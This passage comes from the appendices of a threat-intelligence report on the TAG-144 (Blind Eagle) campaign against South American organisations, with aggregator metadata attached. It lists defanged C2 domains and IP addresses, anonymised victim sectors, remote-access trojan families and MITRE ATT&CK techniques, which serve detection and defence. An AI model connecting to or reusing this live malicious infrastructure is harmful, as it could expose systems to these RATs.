172[.]93[.]160[.]188 2024-10-30 2024-10-30\r\ndeadpoolstart2030[.]duckdns[.]org 192[.]169[.]69[.]26 2025-03-03 2025-03-03\r\ndeadpoolstart2033[.]duckdns[.]org 191[.]88[.]249[.]175 2025-02-12 2025-02-12\r\ndeadpoolstart2034[.]duckdns[.]org 191[.]88[.]249[.]175 2025-03-27 2025-03-27\r\ndeadpoolstart2035[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-28 2025-01-28\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 29 of 34\n\nDomain IP Address First Seen Last Seen\r\ndeadpoolstart2035[.]duckdns[.]org 192[.]169[.]69[.]26 2025-01-31 2025-07-17\r\ndeadpoolstart2036[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-29 2025-02-03\r\ndeadpoolstart2036[.]duckdns[.]org 192[.]169[.]69[.]26 2025-02-03 2025-07-18\r\ndeadpoolstart2037[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-30 2025-02-03\r\ndeadpoolstart2037[.]duckdns[.]org 192[.]169[.]69[.]26 2025-02-03 2025-07-17\r\ndeadpoolstart2038[.]duckdns[.]org 192[.]169[.]69[.]26 2025-02-05 2025-02-05\r\ndeadpoolstart2041[.]duckdns[.]org 179[.]14[.]8[.]131 2025-06-09 2025-06-09\r\ndeadpoolstart2044[.]duckdns[.]org 192[.]169[.]69[.]26 2025-05-09 2025-05-09\r\ndeadpoolstart2044[.]duckdns[.]org 191[.]88[.]249[.]175 2025-03-12 2025-03-12\r\ndeadpoolstart2049[.]duckdns[.]org 179[.]14[.]8[.]131 2025-07-11 2025-07-11\r\ndeadpoolstart2049[.]duckdns[.]org 177[.]255[.]84[.]173 2025-04-12 2025-04-12\r\ndeadpoolstart2051[.]duckdns[.]org 192[.]169[.]69[.]26 2025-05-02 2025-07-18\r\ndeadpoolstart2051[.]duckdns[.]org 177[.]255[.]84[.]173 2025-04-29 2025-05-01\r\ndeadpoolstart2052[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-11 2025-05-11\r\ndeadpoolstart2053[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-11 2025-05-11\r\ndeadpoolstart2054[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-26 2025-05-26\r\ndeadpoolstart2059[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-23 2025-05-23\r\ndeadpoolstart2060[.]duckdns[.]org 192[.]169[.]69[.]26 2025-06-29 2025-07-21\r\ndeadpoolstart2061[.]duckdns[.]org 181[.]131[.]217[.]63 2025-06-17 2025-06-30\r\ndeadpoolstart2061[.]duckdns[.]org 192[.]169[.]69[.]26 2025-06-30 2025-07-17\r\ndeadpoolstart2063[.]duckdns[.]org 181[.]131[.]217[.]63 2025-06-29 2025-06-29\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 30 of 34\n\nDomain IP Address First Seen Last Seen\r\ndeadpoolstart2064[.]duckdns[.]org 181[.]131[.]217[.]63 2025-07-03 2025-07-04\r\ndeadpoolstart2065[.]duckdns[.]org 181[.]131[.]217[.]63 2025-07-04 2025-07-05\r\nAppendix F: Cluster 2 Victims\r\nSuspected Victim Sector C2 Server(s) First Seen Last Seen\r\nVictim 20 Government 64[.]188[.]9[.]173 2024-10-11 2024-10-22\r\nVictim 20 Government 64[.]188[.]9[.]177 2024-10-16 2024-10-16\r\nVictim 21 Transport 64[.]188[.]9[.]173 2024-10-11 2024-10-21\r\nVictim 22 Education 64[.]188[.]9[.]177 2024-10-16 2024-10-31\r\nVictim 23 Education 64[.]188[.]9[.]177 2024-10-19 2024-10-19\r\nVictim 24 Government 64[.]188[.]9[.]172 2024-10-01 2024-10-06\r\nVictim 25 Government / Defense 64[.]188[.]9[.]172 2024-10-11 2024-10-15\r\nVictim 26 Government 64[.]188[.]9[.]173 2024-10-24 2024-10-24\r\nVictim 27 Retail 64[.]188[.]9[.]177 2024-12-20 2024-12-20\r\nVictim 28 Oil 64[.]188[.]9[.]173 2024-10-11 2024-10-30\r\nAppendix G: Cluster 3 IP Addresses\r\nIP Address ASN Type Malware Families\r\n181[.]131[.]216[.]206 AS13489 Colombian ISP REMCOS RAT\r\n181[.]131[.]218[.]182 AS13489 Colombian ISP REMCOS RAT\r\n181[.]131[.]219[.]42 AS13489 Colombian ISP REMCOS RAT, AsyncRAT\r\nAppendix H: Cluster 4 IP Addresses\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 31 of 34\n\nIP Address ASN Suspected Type Malware Family\r\n45[.]135[.]232[.]38 AS198953 Virtual Private Server AsyncRAT\r\n46[.]246[.]82[.]9 AS42708 Virtual Private Server XWorm\r\n89[.]117[.]23[.]25 AS40021 Virtual Private Server REMCOS RAT\r\n178[.]73[.]218[.]8 AS42708 Virtual Private Server AsyncRAT\r\n181[.]235[.]3[.]0 AS3816 Colombian ISP AsyncRAT\r\n191[.]93[.]113[.]151 AS27831 Colombian ISP AsyncRAT\r\nAppendix I: Cluster 5 Domains\r\nDomain First Seen Last Seen Malware Families\r\n2seguro2025[.]duckdns[.]org 2025-04-01 2025-07-09 N/A\r\nansy10jun[.]duckdns[.]org 2025-06-21 2025-06-29 AsyncRAT\r\nansy1703[.]duckdns[.]org 2025-03-20 2025-06-14 AsyncRAT\r\nasegurar2octubre[.]duckdns[.]org 2025-03-12 2025-07-17 AsyncRAT\r\nasegurar3octubre[.]duckdns[.]org 2025-05-08 2025-07-18 AsyncRAT\r\nbb2023[.]duckdns[.]org 2025-06-13 2025-07-10 N/A\r\ndcabril[.]duckdns[.]org 2025-06-13 2025-07-19 N/A\r\ngotemburgoxm[.]duckdns[.]org 2025-05-07 2025-07-15 REMCOS RAT, XWorm\r\nromanovas[.]duckdns[.]org 2025-03-04 2025-06-19 LimeRAT\r\nAppendix J: Original SVG Attachment\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 32 of 34\n\nAppendix K: MITRE ATT\u0026CK Techniques\r\nTactic: Technique ATT\u0026CK Code\r\nCommand and Control: Application Layer Protocol: Web Protocols T1071.001\r\nCommand and Control: Encrypted Channel: Asymmetric Cryptography T1573.002\r\nCommand and Control: Encrypted Channel: Symmetric Cryptography T1573.001\r\nCommand and Control: Ingress Tool Transfer T1105\r\nDefense Evasion: Modify Registry T1112\r\nDiscovery: System Information Discovery T1082\r\nDiscovery: Query Registry T1012\r\nExecution: Command and Scripting Interpreter: PowerShell T1059.001\r\nInitial Access: Spearphishing Link T1566.002\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 33 of 34\n\nTactic: Technique ATT\u0026CK Code\r\nResource Development: Acquire Infrastructure: Domains T1583.001\r\nResource Development: Acquire Infrastructure: Virtual Private Server T1583.003\r\nResource Development: Acquire Infrastructure: Server T1583.004\r\nResource Development: Acquire Infrastructure: Malvertising T1583.008\r\nResource Development: Compromise Infrastructure: Server T1584.004\r\nSource: https://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 34 of 34\n\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations \nTactic: Technique ATT\u0026CK Code\nResource Development: Acquire Infrastructure: Domains T1583.001\nResource Development: Acquire Infrastructure: Virtual Private Server T1583.003\nResource Development: Acquire Infrastructure: Server T1583.004\nResource Development: Acquire Infrastructure: Malvertising T1583.008\nResource Development: Compromise Infrastructure: Server T1584.004\nSource: https://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations \n Page 34 of 34", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations" ], "report_names": [ "tag-144s-persistent-grip-on-south-american-organizations" ], "threat_actors": [ { "id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813", "created_at": "2022-10-25T15:50:23.688973Z", "updated_at": "2026-04-10T02:00:05.390055Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "APT-C-36", "Blind Eagle" ], "source_name": "MITRE:APT-C-36", "tools": [ "Imminent Monitor" ], "source_id": "MITRE", "reports": null }, { "id": "be597b07-0cde-47bc-80c3-790a8df34af4", "created_at": "2022-10-25T16:07:23.407484Z", "updated_at": "2026-04-10T02:00:04.58656Z", "deleted_at": null, "main_name": "Blind Eagle", "aliases": [ "APT-C-36", "APT-Q-98", "AguilaCiega", "G0099" ], "source_name": "ETDA:Blind Eagle", "tools": [ "AsyncRAT", "BitRAT", "Bladabindi", "BlotchyQuasar", "Imminent Monitor", "Imminent Monitor RAT", "Jorik", "LimeRAT", "Remcos", "RemcosRAT", "Remvio", "Socmer", "Warzone", "Warzone RAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "bd43391b-b835-4cb3-839a-d830aa1a3410", "created_at": "2023-01-06T13:46:38.925525Z", "updated_at": "2026-04-10T02:00:03.147197Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "Blind Eagle" ], "source_name": "MISPGALAXY:APT-C-36", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775439143, "ts_updated_at": 1775826749, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ba28e9414078c889952e5f33706d74ff2e7184f9.pdf", "text": "https://archive.orkl.eu/ba28e9414078c889952e5f33706d74ff2e7184f9.txt", "img": "https://archive.orkl.eu/ba28e9414078c889952e5f33706d74ff2e7184f9.jpg" } }